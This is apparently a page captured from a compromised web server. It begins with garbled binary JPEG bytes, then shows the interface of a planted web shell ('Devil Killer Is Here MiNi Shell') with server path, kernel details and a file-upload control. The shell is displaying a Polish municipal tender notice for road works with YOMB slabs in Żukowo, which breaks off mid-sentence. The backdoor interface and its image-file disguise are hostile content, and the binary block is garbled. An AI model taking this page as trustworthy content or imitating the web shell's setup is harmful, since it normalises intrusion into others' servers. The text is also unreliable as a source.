JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251010/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251010/0046878101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych w zakresie dróg gminnych na terenie gminy Żukowo – układanie płyt typu yomb </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Spółka Komunalna Żukowo Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 220793020</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pod Otomino 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żukowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@skzukowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.skzukowo.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 1 - gospodarka wodna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych w zakresie dróg gminnych na terenie gminy Żukowo – układanie płyt typu yomb </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b8a5c336-7f6f-43fb-8390-37dfb0df004c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00468781</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1191495 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Komunikacja między zamawiającym i wykonawcą odbywa się przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną za pośrednictwem<br/>bezpłatnego dla Wykonawców narzędzia platformazakupowa.pl (dalej Platforma zakupowa), dostępnego pod linkiem:<br/>https://platformazakupowa.pl/pn/sk_zukowo<br/>w zakładce dedykowanej niniejszemu postępowaniu.<br/>2) Komunikacja między Zamawiającym i Wykonawcą odbywa się przy użyciu formularza &#34;Wyślij wiadomość&#34; dostępnego po<br/>kliknięciu na link do Platformy zakupowej.<br/>3) W sytuacjach awaryjnych np. w przypadku przerwy w funkcjonowaniu lub awarii lub niedziałania Platformy zakupowej<br/>zamawiający dopuszcza komunikację z wykonawcami za pomocą poczty elektronicznej, na adres przetargi@skzukowo.pl , z<br/>zastrzeżeniem, że Ofertę (w szczególności Formularz oferty) Wykonawca może złożyć wyłącznie za pośrednictwem Platformy<br/>zakupowej: https://platformazakupowa.pl/transakcja/1191495</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wymagania techniczne i<br/>organizacyjne dot. Platformy zakupowej, zostały przedstawione w § 3 ust. 3 Regulaminu Internetowej Platformy zakupowej<br/>platformazakupowa.pl dostępnego na stronie internetowej Platformy;<br/>2) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki;<br/>3) Za datę przekazania oświadczeń, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich doręczenia za pośrednictwem formularza Platformy<br/>zakupowej;<br/>4) Dokumenty sporządza się pod rygorem nieważności w formie elektronicznej (z podpisem kwalifikowanym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym (za pomocą profilu zaufanego) lub podpisem osobistym (z użyciem e-dowodu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 oraz 14 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. (RODO), informujemy, że:<br/>1. Administrator danych<br/>Administratorem Pani/Pana danych osobowych jest Spółka Komunalna Żukowo Sp. z o.o. z siedzibą przy ul. Pod Otomino 44, 83-<br/>330 Żukowo, wpisana do Krajowego Rejestru Sądowego pod numerem KRS: 0000329900, NIP: 589-196-21-10, REGON:<br/>220793020.<br/>2. Kontakt z Administratorem i Inspektorem Ochrony Danych<br/>Z Administratorem można skontaktować się pisemnie na ww. adres siedziby lub mailowo: sekretariat@skzukowo.pl<br/>Inspektorem Ochrony Danych jest adw. Konrad Wysocki – kontakt możliwy pod adresem: iod@skzukowo.pl<br/>3. Cele i podstawy prawne przetwarzania<br/>Pani/Pana dane osobowe mogą być przetwarzane w następujących celach:<br/>Cel przetwarzania Podstawa prawna Uzasadniony interes administratora<br/>Przeprowadzenie postępowania zakupowego / przetargowego art. 6 ust. 1 lit. b RODO – podjęcie działań przed zawarciem umowy;<br/>art. 6 ust. 1 lit. c RODO – obowiązek prawny wynikający z ustawy Prawo zamówień publicznych —<br/>Zawarcie i wykonanie umowy art. 6 ust. 1 lit. b RODO Realizacja umowy<br/>Utrzymywanie kontaktu z osobami wskazanymi do kontaktu lub reprezentującymi wykonawcę art. 6 ust. 1 lit. f RODO Prawnie<br/>uzasadniony interes – zapewnienie właściwej komunikacji i realizacji umowy<br/>Wypełnienie obowiązków prawnych ciążących na Administratorze, w tym archiwizacji dokumentów, realizacji obowiązków<br/>podatkowych i księgowych art. 6 ust. 1 lit. c RODO —<br/>Dochodzenie lub obrona roszczeń art. 6 ust. 1 lit. f RODO oraz art. 9 ust. 2 lit. f RODO (jeśli dane zawierają informacje szczególnej<br/>kategorii) Prawnie uzasadniony interes Administratora<br/>4. Kategorie danych<br/>W zależności od relacji z Administratorem mogą być przetwarzane następujące kategorie danych:<br/>• dane identyfikacyjne (np. imię, nazwisko, stanowisko),<br/>• dane kontaktowe (adres e-mail, numer telefonu),<br/>• dane dotyczące reprezentacji podmiotu (np. pełnomocnictwa, KRS),<br/>• dane zawarte w ofertach, załącznikach do ofert, umowach, fakturach i korespondencji,<br/>• inne dane niezbędne do realizacji zamówienia lub umowy.<br/>5. Źródło danych<br/>Pani/Pana dane mogły zostać:<br/>• przekazane bezpośrednio przez Panią/Pana,<br/>• udostępnione przez pracodawcę / zleceniodawcę jako dane osoby kontaktowej lub reprezentującej wykonawcę,<br/>• pozyskane z publicznych rejestrów (np. CEIDG, KRS).<br/>6. Odbiorcy danych<br/>Dane osobowe mogą być przekazywane:<br/>• podmiotom upoważnionym na podstawie przepisów prawa (np. Urząd Skarbowy, sądy, organy nadzoru),<br/>• dostawcom usług technicznych i organizacyjnych (np. dostawcy oprogramowania, firmy doradcze, kancelarie prawne, audytorzy),<br/>• podmiotom świadczącym usługi pocztowe, kurierskie, księgowe,<br/>• partnerom umownym uczestniczącym w realizacji postępowań (np. inżynier kontraktu, inspektor nadzoru),<br/>• platformie zakupowej (https://platformazakupowa.pl/pn/sk_zukowo), której operatorem i administratorem danych osobowych jest<br/>Open Nexus Sp. z o.o., Bolesława Krzywoustego 3, 61-144 Poznań.<br/>7. Przekazywanie danych do państw trzecich<br/>Administrator nie przekazuje danych osobowych poza Europejski Obszar Gospodarczy ani do organizacji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/8/R/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot niniejszego zamówienia obejmuje wykonanie robót budowlanych w zakresie przebudowy, remontów dróg gminnych na terenie gminy Żukowo.<br/>2.	Zakres drogowych robót budowlanych obejmuje m.in.:<br/>1)	Prace przygotowawcze: koryta wykonane mechanicznie gł. 30 cm, roboty ziemne wykonywane koparkami przedsiębiernymi o pojemności łyżki 1,20 m3 w gruncie kat. III z transportem urobku samochodami samowyładowczymi na odległość 10 km (z dodatkiem za oczyszczenie nawierzchni z ziemi wynoszonej na kołach)<br/>2)	Układanie płyt yomb nowych i używanych: wykonanie podsypki piaskowej 12 cm, nawierzchnie z płyt wielootworowych (płyty o powierzchni do 1m2) - budowa, ręczne plantowanie poboczy, transport płyt używanych do 2 km<br/>3)	Prace porządkowe: transport materiałów samochodami skrzyniowymi z załadunkiem i wyładunkiem mechanicznym na odległość do 10 km, utylizacja płyt yomb<br/>3.	Wykonawca będzie realizował w/w roboty budowlane z wykorzystaniem następujących materiałów budowlanych, przekazanych przez Zamawiającego:<br/>1)	podsypka piaskowa lub tłuczeń z piaskiem<br/>2)	nowe płyty typu yomb<br/>3)	używane płyty typu yomb.<br/>4.	Zamawiający zapewni w/w materiały w ilości zapewniającej wykonanie robót w 100% (również w przypadku uruchomienia zamówienia w ramach prawa opcji). Materiały te zostaną dostarczone Wykonawcy na teren budowy. Wykonawca zobowiązany jest przystąpić do prac w terminie 5 dni od otrzymania zlecenia od Zamawiającego.<br/>5.	Wszelki niezbędny sprzęt oraz inne materiały niezbędne do zrealizowania przedmiotu zamówienia wykonawca zobowiązany będzie zapewnić w ramach złożonej oferty.<br/>6.	Szczegółowy zakres przedmiotu zamówienia określający dokładny zakres oraz wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, zawarto w dokumentacji technicznej stanowiącej załącznik nr 7 do niniejszej SWZ, zestawieniu cenowym oferty (załącznik do Formularza ofertowego) oraz wzorze umowy (załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Z uwagi na możliwość bieżących potrzeb Zamawiającego, ilości robót określone w zestawieniu cenowym oferty mogą ulec zmianie. W związku z powyższym, Zamawiający stosownie do art. 441 ust. 1 Pzp zastrzega sobie prawo do prawa opcji<br/>obejmującego swoim zakresem możliwość:<br/>1) zmiany ilości do 100% poszczególnych elementów przedmiotu zamówienia (określonych w zestawieniu cenowym oferty)<br/>przy zachowaniu cen jednostkowych określonych przez Wykonawcę w ofercie,<br/>2) zwiększenia zakresu przedmiotu zamówienia powodującego zwiększenie wynagrodzenia maksymalnie o 100%.<br/>2. Ostateczne wynagrodzenie Wykonawcy zależne będzie od ilości zrealizowanego zakresu przedmiotu zamówienia w<br/>okresie trwania umowy i określone zostanie na podstawie cen jednostkowych ustalonych w oparciu o ofertę przedłożoną<br/>przez Wykonawcę oraz faktyczne ilości robót danego rodzaju.<br/>3. Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W<br/>przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Wykonawca przyjmuje, że usługi objęte prawem opcji, będą realizowane w zakresie i wielkości, zgodnie ze złożonym przez<br/>Zamawiającego oświadczeniem.<br/>4. Zamawiający przewiduje uruchomienie zamówienia na prawach opcji w okresie do 12 miesięcy od dnia zawarcia umowy.<br/>Zamawiający zastrzega, że podejmie decyzję co do możliwości i woli skorzystania z prawa opcji zgodnie z<br/>zapotrzebowaniem i posiadanymi możliwościami finansowymi. Zastrzega się, że zakres objęty prawem opcji nie stanowi<br/>zobowiązania finansowego Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a<br/>przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Po upływie okresu, o którym mowa w<br/>zdaniu pierwszym, zastrzeżone prawo opcji wygasa, w związku z czym Zamawiający po upływie tego okresu nie może już z<br/>niego skorzystać.<br/>5. Zamówienie objęte prawem opcji Wykonawca zobowiązany jest wykonać po uprzednim otrzymaniu od Zamawiającego<br/>pisemnego oświadczenia, że zamierza skorzystać z prawa opcji. W momencie złożenia oświadczenia, o którym mowa w<br/>zdaniu poprzedzającym, następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej<br/>z zakresu usługi do realizacji na mocy danego oświadczenia, opcji.<br/>6. Zamawiający, poinformuje Wykonawcę o przewidywanym terminie uruchomienia prawa opcji, nie później niż na 5 dni<br/>kalendarzowych na adres e-mail podany przez Wykonawcę, przed planowanym terminem rozpoczęcia realizacji usługi<br/>objętej prawem opcji.<br/>7. Zamawiający dokona zapłaty wynagrodzenia wykonawcy za wykonanie usług objętych prawem opcji w wysokości<br/>określonej w umowie.<br/>8. Realizacja zakresu objętego prawem opcji odbędzie się zgodnie z warunkami określonymi w SWZ, w tym we Wzorze<br/>umowy w sprawie zamówienia publicznego, stanowiącym załącznik nr 4 do SWZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert określono w Części XIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia łącznie następujące warunki:<br/>1) nie podlega wykluczeniu na podstawie:<br/>a) art. 108 Pzp z uwzględnieniem postanowień art. 110 Pzp,<br/>b) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835),<br/>2) spełnia warunki, o których mowa w art. 112 ust. 2 Pzp, określone w pkt 2.<br/>2. Warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 Pzp dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym: Zamawiający nie precyzuje warunku w tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4) Zdolności technicznej lub zawodowej:<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej dwie roboty budowlane polegające na ułożeniu płyt tj. płyty drogowe, płyty YOMB o powierzchni ułożonych płyt nie mniejszej niż 500 m2 dla każdej roboty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca składając ofertę zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert w wysokości<br/>7 000,00 zł.<br/>2. Wadium Wykonawca wnosi w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2025.98 t.j.).<br/>3. Zamawiający odrzuci ofertę Wykonawcy z postępowania w przypadku, gdy:<br/>1) oferta nie będzie zabezpieczona wadium przez cały okres związania ofertą, w tym również na przedłużony okres<br/>związania ofertą,<br/>2) wadium zostało wniesione w innej formie lub w mniejszej wysokości niż określił Zamawiający w pkt 2. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono w § 13 wzoru umowy (załączniki nr 4 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1191495</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. do pkt. 3.15.) RODO (obowiązek informacyjny): 8. Okres przechowywania danych<br/>Dane osobowe będą przechowywane przez czas:<br/>• trwania postępowania przetargowego,<br/>• trwania umowy i rozliczeń finansowych,<br/>• wymagany przepisami prawa (np. ustawa o rachunkowości – 5 lat),<br/>• do momentu upływu terminu przedawnienia ewentualnych roszczeń (co do zasady 6 lat).<br/>9. Prawa osoby, której dane dotyczą<br/>Przysługuje Pani/Panu prawo do:<br/>• dostępu do danych i otrzymania ich kopii (art. 15 RODO),<br/>• sprostowania danych (art. 16 RODO),<br/>• usunięcia danych („prawo do bycia zapomnianym”, art. 17 RODO),<br/>• ograniczenia przetwarzania (art. 18 RODO),<br/>• przenoszenia danych (art. 20 RODO),<br/>• wniesienia sprzeciwu wobec 